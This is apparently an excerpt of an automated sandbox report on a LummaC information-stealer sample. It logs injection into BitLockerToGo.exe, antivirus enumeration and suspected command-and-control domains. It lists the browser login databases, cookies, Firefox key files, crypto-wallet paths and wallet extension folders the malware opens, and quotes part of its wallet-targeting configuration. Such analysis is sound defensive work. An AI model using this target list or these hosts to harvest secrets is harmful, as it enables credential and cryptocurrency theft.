                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696508427
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696508427j
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696508427x
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696508427
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696508427]
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696508427
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696508427t
                Source: BitLockerToGo.exe, 00000004.00000003.2788188304.000000000548A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696508427
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0043D910 LdrInitializeThunk,4_2_0043D910

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Allocates memory in foreign processes
                Source: C:\Users\user\Desktop\NjFiIQNSid.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and writeJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\NjFiIQNSid.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5AJump to behavior
                LummaC encrypted strings found
                Source: NjFiIQNSid.exe, 00000000.00000002.2739851762.0000000009D64000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: cloudewahsj.shop
                Source: NjFiIQNSid.exe, 00000000.00000002.2739851762.0000000009D64000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: rabidcowse.shop
                Source: NjFiIQNSid.exe, 00000000.00000002.2739851762.0000000009D64000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: noisycuttej.shop
                Source: NjFiIQNSid.exe, 00000000.00000002.2739851762.0000000009D64000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: tirepublicerj.shop
                Source: NjFiIQNSid.exe, 00000000.00000002.2739851762.0000000009D64000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: framekgirus.shop
                Source: NjFiIQNSid.exe, 00000000.00000002.2739851762.0000000009D64000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: wholersorie.shop
                Source: NjFiIQNSid.exe, 00000000.00000002.2739851762.0000000009D64000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: abruptyopsn.shop
                Source: NjFiIQNSid.exe, 00000000.00000002.2739851762.0000000009D64000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: nearycrepso.shop
                Source: NjFiIQNSid.exe, 00000000.00000002.2739851762.0000000009D64000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: bootstringjl.click
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\NjFiIQNSid.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: A98008Jump to behavior
                Source: C:\Users\user\Desktop\NjFiIQNSid.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\NjFiIQNSid.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000Jump to behavior
                Source: C:\Users\user\Desktop\NjFiIQNSid.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 442000Jump to behavior
                Source: C:\Users\user\Desktop\NjFiIQNSid.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 445000Jump to behavior
                Source: C:\Users\user\Desktop\NjFiIQNSid.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 453000Jump to behavior
                Source: C:\Users\user\Desktop\NjFiIQNSid.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00438040 cpuid 4_2_00438040
                Source: C:\Users\user\Desktop\NjFiIQNSid.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\NjFiIQNSid.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: BitLockerToGo.exe, 00000004.00000002.2860232578.00000000054CC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2834241377.00000000031B4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2858411368.00000000031A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2834331302.0000000003137000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2859546494.00000000031A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2847490722.00000000031B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 6484, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: BitLockerToGo.exe, 00000004.00000003.2834241377.000000000314F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets
                Source: BitLockerToGo.exe, 00000004.00000003.2847490722.00000000031A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","mf
                Source: BitLockerToGo.exe, 00000004.00000003.2834241377.000000000314F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/JAXX New Version
                Source: BitLockerToGo.exe, 00000004.00000003.2820715380.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: BitLockerToGo.exe, 00000004.00000003.2847490722.00000000031A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: um","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":2097152
                Source: BitLockerToGo.exe, 00000004.00000003.2847490722.00000000031A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: um","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":2097152
                Source: BitLockerToGo.exe, 00000004.00000003.2834241377.000000000314F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                Source: BitLockerToGo.exe, 00000004.00000003.2820715380.0000000003150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: BitLockerToGo.exe, 00000004.00000003.2834241377.000000000314F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\logins.jsonJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\places.sqliteJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\key4.dbJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\cert9.dbJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\formhistory.sqliteJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\cookies.sqliteJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
